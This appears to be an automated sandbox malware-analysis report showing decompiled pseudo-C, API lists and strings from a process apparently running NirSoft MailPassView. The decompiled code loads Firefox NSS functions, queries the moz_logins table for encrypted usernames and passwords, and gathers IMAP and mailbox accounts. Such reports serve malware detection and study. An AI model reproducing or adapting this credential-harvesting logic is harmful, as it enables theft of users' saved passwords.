                                                                                                                                                    						} else {
                                                                                                                                                    							_t130 = _v64(_a8);
                                                                                                                                                    						}
                                                                                                                                                    						if(_t130 != 0x64) {
                                                                                                                                                    							goto L34;
                                                                                                                                                    						}
                                                                                                                                                    						_v8756 = _t196;
                                                                                                                                                    						memset( &_v8755, _t196, 0x3ff);
                                                                                                                                                    						memset( &_v7732, _t196, 0x1400);
                                                                                                                                                    						_t240 = _t239 + 0x18;
                                                                                                                                                    						_t235 = E0040F7EE( &_v72, _a8, 1);
                                                                                                                                                    						_v20 = E0040F7EE( &_v72, _a8, 6);
                                                                                                                                                    						_v8 = E0040F7EE( &_v72, _a8, 7);
                                                                                                                                                    						_v24 = E0040F7EE( &_v72, _a8, 4);
                                                                                                                                                    						_v32 = E0040F7EE( &_v72, _a8, 5);
                                                                                                                                                    						_v16 = E0040F7EE( &_v72, _a8, 2);
                                                                                                                                                    						if(_t235 != _t196) {
                                                                                                                                                    							strcpy( &_v8756, _t235);
                                                                                                                                                    						}
                                                                                                                                                    						if(_v20 != _t196) {
                                                                                                                                                    							strcpy( &_v7732, _v20);
                                                                                                                                                    						}
                                                                                                                                                    						if(_v8 != _t196) {
                                                                                                                                                    							strcpy( &_v6708, _v8);
                                                                                                                                                    						}
                                                                                                                                                    						if(_v24 != _t196) {
                                                                                                                                                    							strcpy( &_v5684, _v24);
                                                                                                                                                    						}
                                                                                                                                                    						if(_v32 != _t196) {
                                                                                                                                                    							strcpy( &_v4660, _v32);
                                                                                                                                                    						}
                                                                                                                                                    						if(_v16 != _t196) {
                                                                                                                                                    							strcpy( &_v3636, _v16);
                                                                                                                                                    						}
                                                                                                                                                    						_v332 = _t196;
                                                                                                                                                    						memset( &_v331, _t196, 0xff);
                                                                                                                                                    						_v588 = _t196;
                                                                                                                                                    						memset( &_v587, _t196, 0xff);
                                                                                                                                                    						_t239 = _t240 + 0x18;
                                                                                                                                                    						E0040CD27(_v8, _t226,  &_v588);
                                                                                                                                                    						E0040CD27(_v20, _t226,  &_v332);
                                                                                                                                                    						_v8 = _t196;
                                                                                                                                                    						if( *((intOrPtr*)(_t226 + 0x474)) > _t196) {
                                                                                                                                                    							_v16 = _t226 + 0x468;
                                                                                                                                                    							do {
                                                                                                                                                    								_t237 = E0040D438(_v8, _v16);
                                                                                                                                                    								_v2612 = _t196;
                                                                                                                                                    								memset( &_v2611, _t196, 0x261);
                                                                                                                                                    								_v1996 = _t196;
                                                                                                                                                    								memset( &_v1995, _t196, 0x261);
                                                                                                                                                    								_t86 = _t237 + 0x104; // 0x104
                                                                                                                                                    								_t229 = _t86;
                                                                                                                                                    								sprintf( &_v2612, "mailbox://%s", _t229);
                                                                                                                                                    								sprintf( &_v1996, "imap://%s", _t229);
                                                                                                                                                    								_push( &_v3636);
                                                                                                                                                    								_t170 =  &_v2612;
                                                                                                                                                    								_push(_t170);
                                                                                                                                                    								L004115B2();
                                                                                                                                                    								_t239 = _t239 + 0x38;
                                                                                                                                                    								if(_t170 == 0) {
                                                                                                                                                    									L31:
                                                                                                                                                    									_t94 = _t237 + 0x304; // 0x304
                                                                                                                                                    									E004060D0(0xff, _t94,  &_v588);
                                                                                                                                                    									_t96 = _t237 + 0x204; // 0x204
                                                                                                                                                    									E004060D0(0xff, _t96,  &_v332);
                                                                                                                                                    									_t196 = 0;
                                                                                                                                                    									goto L32;
                                                                                                                                                    								}
                                                                                                                                                    								_push( &_v3636);
                                                                                                                                                    								_t177 =  &_v1996;
                                                                                                                                                    								_push(_t177);
                                                                                                                                                    								L004115B2();
                                                                                                                                                    								if(_t177 != 0) {
                                                                                                                                                    									goto L32;
                                                                                                                                                    								}
                                                                                                                                                    								goto L31;
                                                                                                                                                    								L32:
                                                                                                                                                    								_v8 =  &(_v8[1]);
                                                                                                                                                    								_t175 = _a4;
                                                                                                                                                    							} while (_v8 <  *((intOrPtr*)(_t175 + 0x474)));
                                                                                                                                                    							_t226 = _t175;
                                                                                                                                                    						}
                                                                                                                                                    						goto L11;
                                                                                                                                                    						L34:
                                                                                                                                                    						if(_a8 != _t196 && _v48 != _t196) {
                                                                                                                                                    							_v48(_a8);
                                                                                                                                                    						}
                                                                                                                                                    						if(_v44 != _t196) {
                                                                                                                                                    							_v44(_v12);
                                                                                                                                                    						}
                                                                                                                                                    						goto L39;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    			}
                                                                                                                                                    0x0040cfd3
                                                                                                                                                    0x0040cfe0
                                                                                                                                                    0x0040cfe3
                                                                                                                                                    0x0040cfed
                                                                                                                                                    0x0040cff3
                                                                                                                                                    0x0040cff7
                                                                                                                                                    0x0040d003
                                                                                                                                                    0x0040d009
                                                                                                                                                    0x0040d00d
                                                                                                                                                    0x0040d019
                                                                                                                                                    0x0040d01f
                                                                                                                                                    0x0040d023
                                                                                                                                                    0x0040d02f
                                                                                                                                                    0x0040d035
                                                                                                                                                    0x0040d039
                                                                                                                                                    0x0040d045
                                                                                                                                                    0x0040d04b
                                                                                                                                                    0x0040d04f
                                                                                                                                                    0x0040d05b
                                                                                                                                                    0x0040d061
                                                                                                                                                    0x0040d070
                                                                                                                                                    0x0040d076
                                                                                                                                                    0x0040d084
                                                                                                                                                    0x0040d08a
                                                                                                                                                    0x0040d08f
                                                                                                                                                    0x0040d09e
                                                                                                                                                    0x0040d0af
                                                                                                                                                    0x0040d0ba
                                                                                                                                                    0x0040d0bd
                                                                                                                                                    0x0040d0c9
                                                                                                                                                    0x0040d0cc
                                                                                                                                                    0x0040d0dd
                                                                                                                                                    0x0040d0e7
                                                                                                                                                    0x0040d0ed
                                                                                                                                                    0x0040d0fb
                                                                                                                                                    0x0040d101
                                                                                                                                                    0x0040d106
                                                                                                                                                    0x0040d106
                                                                                                                                                    0x0040d119
                                                                                                                                                    0x0040d12b
                                                                                                                                                    0x0040d136
                                                                                                                                                    0x0040d137
                                                                                                                                                    0x0040d13d
                                                                                                                                                    0x0040d13e
                                                                                                                                                    0x0040d143
                                                                                                                                                    0x0040d148
                                                                                                                                                    0x0040d163
                                                                                                                                                    0x0040d16a
                                                                                                                                                    0x0040d175
                                                                                                                                                    0x0040d181
                                                                                                                                                    0x0040d187
                                                                                                                                                    0x0040d18e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d18e
                                                                                                                                                    0x0040d150
                                                                                                                                                    0x0040d151
                                                                                                                                                    0x0040d157
                                                                                                                                                    0x0040d158
                                                                                                                                                    0x0040d161
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d190
                                                                                                                                                    0x0040d190
                                                                                                                                                    0x0040d193
                                                                                                                                                    0x0040d199
                                                                                                                                                    0x0040d1a5
                                                                                                                                                    0x0040d1a5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d1ac
                                                                                                                                                    0x0040d1af
                                                                                                                                                    0x0040d1b9
                                                                                                                                                    0x0040d1bc
                                                                                                                                                    0x0040d1c0
                                                                                                                                                    0x0040d1c5
                                                                                                                                                    0x0040d1c8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d1c0
                                                                                                                                                    0x0040ce89

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF0F
                                                                                                                                                      • Part of subcall function 0040DEEE: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                                                                                                                      • Part of subcall function 0040DEEE: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                                                                                                                      • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF62
                                                                                                                                                      • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF6C
                                                                                                                                                      • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF7A
                                                                                                                                                      • Part of subcall function 0040DEEE: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                                                                                                                      • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                                                                                                                      • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                                                                                                                      • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                                                                                                                      • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                                                                                                                      • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
                                                                                                                                                      • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                                                                                                                      • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                                                                                                                      • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                                                                                                                    • memset.MSVCRT ref: 0040CEA6
                                                                                                                                                    • memset.MSVCRT ref: 0040CEBF
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,0040D314,000000FF,?,00000104,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CED6
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CEF5
                                                                                                                                                    • memset.MSVCRT ref: 0040CF68
                                                                                                                                                    • memset.MSVCRT ref: 0040CF7A
                                                                                                                                                    • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040CFED
                                                                                                                                                    • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D003
                                                                                                                                                    • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D019
                                                                                                                                                    • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D02F
                                                                                                                                                    • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D045
                                                                                                                                                    • strcpy.MSVCRT(?,0040D314,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D05B
                                                                                                                                                    • memset.MSVCRT ref: 0040D076
                                                                                                                                                    • memset.MSVCRT ref: 0040D08A
                                                                                                                                                    • memset.MSVCRT ref: 0040D0ED
                                                                                                                                                    • memset.MSVCRT ref: 0040D101
                                                                                                                                                    • sprintf.MSVCRT ref: 0040D119
                                                                                                                                                    • sprintf.MSVCRT ref: 0040D12B
                                                                                                                                                    • _stricmp.MSVCRT(?,?,?,imap://%s,00000104,?,mailbox://%s,00000104,?,00000000,00000261,?,00000000,00000261,?,?), ref: 0040D13E
                                                                                                                                                    • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040D158
                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?,?,?,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040D1DD
                                                                                                                                                    Strings
                                                                                                                                                    • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 0040CF2B
                                                                                                                                                    • mailbox://%s, xrefs: 0040D113
                                                                                                                                                    • imap://%s, xrefs: 0040D125
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$AddressProcstrcpy$CurrentDirectory$ByteCharLibraryLoadMultiWide_stricmpsprintfstrlen$HandleModule
                                                                                                                                                    • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins$imap://%s$mailbox://%s
                                                                                                                                                    • API String ID: 4276617627-3913509535
                                                                                                                                                    • Opcode ID: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
                                                                                                                                                    • Instruction ID: 531ad7aca3640aed267cd003a13377454315b37e4b42da830508d09ae9ff7478
                                                                                                                                                    • Opcode Fuzzy Hash: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
                                                                                                                                                    • Instruction Fuzzy Hash: 58B10A72C00219ABDB20EFA5CC819DEB7BDEF04315F1445BBE619B2191DB38AB858F54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                    			E0040A774(intOrPtr __ecx, void* __eflags) {
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				struct HMENU__* _t121;
                                                                                                                                                    				struct HWND__* _t122;
                                                                                                                                                    				intOrPtr _t128;
                                                                                                                                                    				int _t133;
                                                                                                                                                    				intOrPtr _t135;
                                                                                                                                                    				int _t149;
                                                                                                                                                    				void* _t166;
                                                                                                                                                    				void* _t174;
                                                                                                                                                    				void* _t178;
                                                                                                                                                    				void* _t185;
	intOrPtr _t194;
	void* _t197;
	void* _t198;
	intOrPtr _t200;
	intOrPtr _t201;
	void* _t202;
	int _t204;
	intOrPtr _t205;
	intOrPtr* _t207;
	intOrPtr* _t208;
	void* _t210;
	intOrPtr* _t211;
	void* _t213;

	_t213 = __eflags;
	_t208 = _t210 - 0x78;
	_t211 = _t210 - 0xb8;
	 *((intOrPtr*)(_t208 + 0x70)) = __ecx;
	 *((char*)(_t208 - 0x37)) = 1;
	 *(_t208 - 0x40) = 0;
	 *((intOrPtr*)(_t208 - 0x3c)) = 0;
	 *((char*)(_t208 - 0x38)) = 0;
	 *((char*)(_t208 - 0x36)) = 0;
	 *((char*)(_t208 - 0x35)) = 0;
	asm("stosd");
	asm("stosd");
	 *(_t208 - 0x2c) = 1;
	 *((intOrPtr*)(_t208 - 0x28)) = 0x9c41;
	 *((char*)(_t208 - 0x24)) = 4;
	 *((char*)(_t208 - 0x23)) = 0;
	 *((char*)(_t208 - 0x22)) = 0;
	 *((char*)(_t208 - 0x21)) = 0;
	asm("stosd");
	asm("stosd");
	 *((intOrPtr*)(_t208 - 0x18)) = 5;
	 *((intOrPtr*)(_t208 - 0x14)) = 0x9c44;
	 *((char*)(_t208 - 0x10)) = 4;
	 *((char*)(_t208 - 0xf)) = 0;
	 *((char*)(_t208 - 0xe)) = 0;
	 *((char*)(_t208 - 0xd)) = 0;
	asm("stosd");
	asm("stosd");
	 *(_t208 - 4) = 2;
	 *_t208 = 0x9c48;
	 *((char*)(_t208 + 4)) = 4;
	 *((char*)(_t208 + 5)) = 0;
	 *((char*)(_t208 + 6)) = 0;
	 *((char*)(_t208 + 7)) = 0;
	asm("stosd");
	asm("stosd");
	 *((intOrPtr*)(_t208 + 0x10)) = 3;
	 *((intOrPtr*)(_t208 + 0x14)) = 0x9c49;
	 *((char*)(_t208 + 0x18)) = 4;
	 *((char*)(_t208 + 0x19)) = 0;
	 *((char*)(_t208 + 0x1a)) = 0;
	 *((char*)(_t208 + 0x1b)) = 0;
	asm("stosd");
	asm("stosd");
	 *((intOrPtr*)(_t208 + 0x24)) = 0;
	 *((intOrPtr*)(_t208 + 0x28)) = 0x9c4e;
	 *((char*)(_t208 + 0x2c)) = 4;
	 *((char*)(_t208 + 0x2d)) = 0;
	 *((char*)(_t208 + 0x2e)) = 0;
	 *((char*)(_t208 + 0x2f)) = 0;
	asm("stosd");
	asm("stosd");
	 *((intOrPtr*)(_t208 + 0x38)) = 6;
	 *((intOrPtr*)(_t208 + 0x3c)) = 0x9c56;
	 *((char*)(_t208 + 0x40)) = 4;
	 *((char*)(_t208 + 0x41)) = 0;
	 *((char*)(_t208 + 0x42)) = 0;
	 *((char*)(_t208 + 0x43)) = 0;
	asm("stosd");
	asm("stosd");
	 *((intOrPtr*)(_t208 + 0x4c)) = 4;
	 *((intOrPtr*)(_t208 + 0x50)) = 0x9c42;
	 *((char*)(_t208 + 0x54)) = 4;
	 *((char*)(_t208 + 0x55)) = 0;
	 *((char*)(_t208 + 0x56)) = 0;
	 *((char*)(_t208 + 0x57)) = 0;
	 *(_t208 + 0x6c) =  *(_t208 + 0x6c) | 0xffffffff;
	asm("stosd");
	_t198 = 0x66;
	asm("stosd");
	_t121 = E00407BB9(_t198);
	_t194 =  *((intOrPtr*)(_t208 + 0x70));
	 *(_t194 + 0x11c) = _t121;
	_t122 = SetMenu( *(_t194 + 0x108), _t121);
	__imp__#6(0x50000000, 0x412466,  *(_t194 + 0x108), 0x101, _t185, _t197, _t166);
	 *(_t194 + 0x114) = _t122;
	SendMessageA(_t122, 0x404, 1, _t208 + 0x6c);
	 *((intOrPtr*)(_t194 + 0x118)) = CreateToolbarEx( *(_t194 + 0x108), 0x50010900, 0x102, 7, 0, LoadImageA( *0x416b94, 0x68, 0, 0, 0, 0x9060), _t208 - 0x40, 8, 0x10, 0x10, 0x70, 0x10, 0x14);
	E004023D4( *((intOrPtr*)(_t194 + 0x370)), _t213, CreateWindowExA(0, "SysListView32", 0, 0x50810809, 0, 0, 0x190, 0xc8,  *(_t194 + 0x108), 0x103,  *0x416b94, 0), 1);
	_t128 =  *((intOrPtr*)(_t194 + 0x370));
	_t173 =  *((intOrPtr*)(_t128 + 0x1b0));
	_t200 =  *((intOrPtr*)(_t128 + 0x1b4));
	 *((intOrPtr*)(_t208 + 0x68)) =  *((intOrPtr*)(_t128 + 0x184));
	if(_t173 <= 0) {
		L3:
		_t201 =  *((intOrPtr*)(_t194 + 0x370));
		E00409EC4(_t201);
		_t133 = ImageList_ReplaceIcon( *(_t201 + 0x18c), 0, LoadIconA( *0x416b94, 0x66));
		if( *((intOrPtr*)(_t201 + 0x1b8)) != 0) {
			E00409E32(_t133, _t173, _t194, _t201);
		}
		_t202 = 0x68;
		 *((intOrPtr*)(_t194 + 0x154)) = E00407BB9(_t202);
		_t135 =  *((intOrPtr*)(_t194 + 0x37c));
		if( *((intOrPtr*)(_t135 + 0x30)) <= 0) {
			_t174 = 0x412466;
		} else {
			if( *((intOrPtr*)(_t135 + 0x1c)) <= 0) {
				_t174 = 0;
			} else {
				_t174 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0xc)))) +  *((intOrPtr*)(_t135 + 0x10));
			}
		}
		_push("/noloadsettings");
		_push(_t174);
		L004115B2();
		if(_t135 == 0) {
			RegDeleteKeyA(0x80000001, "Software\\NirSoft\\MailPassView");
		}
		E0040AF17(_t194, 0);
		 *( *(_t194 + 0x36c)) = 1;
		SetFocus( *( *((intOrPtr*)(_t194 + 0x370)) + 0x184));
		if( *0x417660 == 0) {
			E00406172(0x417660);
			if((GetFileAttributesA(0x417660) & 0x00000001) != 0) {
				GetTempPathA(0x104, 0x417660);
			}
		}
		_t204 = strlen(0x417660);
		 *_t211 = "report.html";
		_t99 = strlen(??) + 1; // 0x1
		_t223 = _t204 + _t99 - 0x104;
		if(_t204 + _t99 >= 0x104) {
			 *((char*)(_t194 + 0x264)) = 0;
		} else {
			E004062AD(_t194 + 0x264, 0x417660, "report.html");
		}
		_push(1);
		_t178 = 0x30;
		E0040A00B( *((intOrPtr*)(_t194 + 0x370)), _t178);
		E0040A00B( *((intOrPtr*)(_t194 + 0x370)), 1, ( *(_t194 + 0x36c))[1]);
		_t149 = RegisterWindowMessageA("commdlg_FindReplace");
		_t205 = _t194;
		 *(_t194 + 0x374) = _t149;
		E0040A27F(0, 1, _t205, _t223);
		E00401E8B(_t223,  *((intOrPtr*)(_t205 + 0x370)) + 0xb20);
		 *(_t208 + 0x60) = 0x12c;
		 *((intOrPtr*)(_t208 + 0x64)) = 0x400;
		SendMessageA( *(_t205 + 0x114), 0x404, 2, _t208 + 0x60);
		return SendMessageA( *(_t205 + 0x114), 0x401, 0x1001, 0);
	} else {
		_t207 = _t200 + 0xc;
		 *((intOrPtr*)(_t208 + 0x74)) = _t173;
		do {
			_t173 =  *((intOrPtr*)(_t207 - 8));
			E00404925( *((intOrPtr*)(_t207 + 4)),  *((intOrPtr*)(_t207 - 8)),  *((intOrPtr*)(_t208 + 0x68)),  *((intOrPtr*)(_t207 - 0xc)),  *((intOrPtr*)(_t207 - 4)),  *_t207);
			_t211 = _t211 + 0x10;
			_t207 = _t207 + 0x14;
			_t82 = _t208 + 0x74;
			 *_t82 =  *((intOrPtr*)(_t208 + 0x74)) - 1;
		} while ( *_t82 != 0);
		goto L3;
	}
}
                                                                                                                                                    0x0040a805
                                                                                                                                                    0x0040a806
                                                                                                                                                    0x0040a807
                                                                                                                                                    0x0040a80e
                                                                                                                                                    0x0040a815
                                                                                                                                                    0x0040a819
                                                                                                                                                    0x0040a81c
                                                                                                                                                    0x0040a81f
                                                                                                                                                    0x0040a827
                                                                                                                                                    0x0040a828
                                                                                                                                                    0x0040a829
                                                                                                                                                    0x0040a82c
                                                                                                                                                    0x0040a833
                                                                                                                                                    0x0040a837
                                                                                                                                                    0x0040a83a
                                                                                                                                                    0x0040a83d
                                                                                                                                                    0x0040a845
                                                                                                                                                    0x0040a846
                                                                                                                                                    0x0040a847
                                                                                                                                                    0x0040a84e
                                                                                                                                                    0x0040a855
                                                                                                                                                    0x0040a859
                                                                                                                                                    0x0040a85c
                                                                                                                                                    0x0040a85f
                                                                                                                                                    0x0040a867
                                                                                                                                                    0x0040a868
                                                                                                                                                    0x0040a869
                                                                                                                                                    0x0040a870
                                                                                                                                                    0x0040a877
                                                                                                                                                    0x0040a87b
                                                                                                                                                    0x0040a87e
                                                                                                                                                    0x0040a881
                                                                                                                                                    0x0040a884
                                                                                                                                                    0x0040a88d
                                                                                                                                                    0x0040a890
                                                                                                                                                    0x0040a891
                                                                                                                                                    0x0040a892
                                                                                                                                                    0x0040a897
                                                                                                                                                    0x0040a8a1
                                                                                                                                                    0x0040a8a7
                                                                                                                                                    0x0040a8c2
                                                                                                                                                    0x0040a8d4
                                                                                                                                                    0x0040a8da
                                                                                                                                                    0x0040a927
                                                                                                                                                    0x0040a95f
                                                                                                                                                    0x0040a964
                                                                                                                                                    0x0040a96a
                                                                                                                                                    0x0040a972
                                                                                                                                                    0x0040a97e
                                                                                                                                                    0x0040a981
                                                                                                                                                    0x0040a9aa
                                                                                                                                                    0x0040a9aa
                                                                                                                                                    0x0040a9b2
                                                                                                                                                    0x0040a9cd
                                                                                                                                                    0x0040a9d9
                                                                                                                                                    0x0040a9db
                                                                                                                                                    0x0040a9db
                                                                                                                                                    0x0040a9e2
                                                                                                                                                    0x0040a9e8
                                                                                                                                                    0x0040a9ee
                                                                                                                                                    0x0040a9f7
                                                                                                                                                    0x0040aa0c
                                                                                                                                                    0x0040a9f9
                                                                                                                                                    0x0040a9fc
                                                                                                                                                    0x0040aa08
                                                                                                                                                    0x0040a9fe
                                                                                                                                                    0x0040aa03
                                                                                                                                                    0x0040aa03
                                                                                                                                                    0x0040a9fc
                                                                                                                                                    0x0040aa11
                                                                                                                                                    0x0040aa16
                                                                                                                                                    0x0040aa17
                                                                                                                                                    0x0040aa20
                                                                                                                                                    0x0040aa2c
                                                                                                                                                    0x0040aa2c
                                                                                                                                                    0x0040aa35
                                                                                                                                                    0x0040aa40
                                                                                                                                                    0x0040aa52
                                                                                                                                                    0x0040aa63
                                                                                                                                                    0x0040aa65
                                                                                                                                                    0x0040aa73
                                                                                                                                                    0x0040aa7b
                                                                                                                                                    0x0040aa7b
                                                                                                                                                    0x0040aa73
                                                                                                                                                    0x0040aa87
                                                                                                                                                    0x0040aa89
                                                                                                                                                    0x0040aa95
                                                                                                                                                    0x0040aa99
                                                                                                                                                    0x0040aa9f
                                                                                                                                                    0x0040aaba
                                                                                                                                                    0x0040aaa1
                                                                                                                                                    0x0040aab1
                                                                                                                                                    0x0040aab7
                                                                                                                                                    0x0040aac6
                                                                                                                                                    0x0040aaca
                                                                                                                                                    0x0040aacb
                                                                                                                                                    0x0040aae2
                                                                                                                                                    0x0040aaec
                                                                                                                                                    0x0040aaf4
                                                                                                                                                    0x0040aaf6
                                                                                                                                                    0x0040aafc
                                                                                                                                                    0x0040ab0d
                                                                                                                                                    0x0040ab29
                                                                                                                                                    0x0040ab30
                                                                                                                                                    0x0040ab37
                                                                                                                                                    0x0040ab53
                                                                                                                                                    0x0040a983
                                                                                                                                                    0x0040a983
                                                                                                                                                    0x0040a986
                                                                                                                                                    0x0040a989
                                                                                                                                                    0x0040a991
                                                                                                                                                    0x0040a99a
                                                                                                                                                    0x0040a99f
                                                                                                                                                    0x0040a9a2
                                                                                                                                                    0x0040a9a5
                                                                                                                                                    0x0040a9a5
                                                                                                                                                    0x0040a9a5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040a989

APIs
  • Part of subcall function 00407BB9: LoadMenuA.USER32 ref: 00407BC1
  • Part of subcall function 00407BB9: sprintf.MSVCRT ref: 00407BE4
• SetMenu.USER32(?,00000000), ref: 0040A8A7
• #6.COMCTL32(50000000,Function_00012466,?,00000101), ref: 0040A8C2
• SendMessageA.USER32 ref: 0040A8DA
• LoadImageA.USER32 ref: 0040A8F0
• CreateToolbarEx.COMCTL32(?,50010900,00000102,00000007,00000000,00000000,?,00000008,00000010,00000010,00000070,00000010,00000014), ref: 0040A91A
• CreateWindowExA.USER32 ref: 0040A950
• LoadIconA.USER32(00000066,00000000), ref: 0040A9BF
• ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040A9CD
• _stricmp.MSVCRT(Function_00012466,/noloadsettings), ref: 0040AA17
• RegDeleteKeyA.ADVAPI32(80000001,Software\NirSoft\MailPassView), ref: 0040AA2C
• SetFocus.USER32(?,00000000), ref: 0040AA52
• GetFileAttributesA.KERNEL32(00417660), ref: 0040AA6B
• GetTempPathA.KERNEL32(00000104,00417660), ref: 0040AA7B
• strlen.MSVCRT ref: 0040AA82
• strlen.MSVCRT ref: 0040AA90
• RegisterWindowMessageA.USER32(commdlg_FindReplace,?,00000001), ref: 0040AAEC
  • Part of subcall function 00404925: strlen.MSVCRT ref: 00404942
  • Part of subcall function 00404925: SendMessageA.USER32 ref: 00404966
• SendMessageA.USER32 ref: 0040AB37
• SendMessageA.USER32 ref: 0040AB4A
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Message$Send$Loadstrlen$CreateIconImageMenuWindow$AttributesDeleteFileFocusList_PathRegisterReplaceTempToolbar_stricmpsprintf
• String ID: /noloadsettings$Software\NirSoft\MailPassView$SysListView32$`vA$commdlg_FindReplace$report.html
• API String ID: 873469642-860065374
• Opcode ID: a4e7fbf76496b0a5143eb8d44d5c426d23ad41d46f34e9c279854c8240868147
• Instruction ID: ca2bded9840d9beafebaacef77bacb5142d556b3fd29cdc4ce09694084a06bb6
• Opcode Fuzzy Hash: a4e7fbf76496b0a5143eb8d44d5c426d23ad41d46f34e9c279854c8240868147
• Instruction Fuzzy Hash: 82B12271644388FFEB16CF74CC45BDABBA5BF14304F00406AFA44A7292C7B5A954CB5A
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                    			E0040DB39(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, void _a10, unsigned int _a12, void _a264, void _a265, void _a520, void _a521, void _a776, void _a780, char _a784, char _a1056, void _a1057, char _a2080, void _a2081, char _a3104, void _a3105) {
                                                                                                                                                    				char _v0;
				struct HWND__* _v4;
				void* __edi;
				void* _t44;
				void* _t58;
				int _t59;
				int _t61;
				int _t62;
				long _t66;
				struct HWND__* _t93;
				intOrPtr _t122;
				unsigned int _t125;
				signed int _t127;
				signed int _t128;
				void* _t134;

				_t128 = _t127 & 0xfffffff8;
				E004118A0(0x1424, __ecx);
				_t44 = _a8 - 0x110;
				if(_t44 == 0) {
					E00406491(__edx, _a4);
					 *_t128 = 0x7ff;
					_a3104 = 0;
					memset( &_a3105, 0, ??);
					asm("movsd");
					asm("movsd");
					asm("movsw");
					memset( &_a10, 0, 0xfb);
					_a520 = 0;
					memset( &_a521, 0, 0xff);
					_a264 = 0;
					memset( &_a265, 0, 0xff);
					_a1056 = 0;
					memset( &_a1057, 0, 0x3ff);
					_a2080 = 0;
					memset( &_a2081, 0, 0x3ff);
					_t134 = _t128 + 0x48;
					_t58 = GetCurrentProcess();
					_t102 =  &_a520;
					_v4 = _t58;
					_t59 = ReadProcessMemory(_t58,  *0x416c64,  &_a520, 0x80, 0);
					__eflags = _t59;
					if(_t59 != 0) {
						E00406585( &_a1056,  &_a520, 4);
						_pop(_t102);
					}
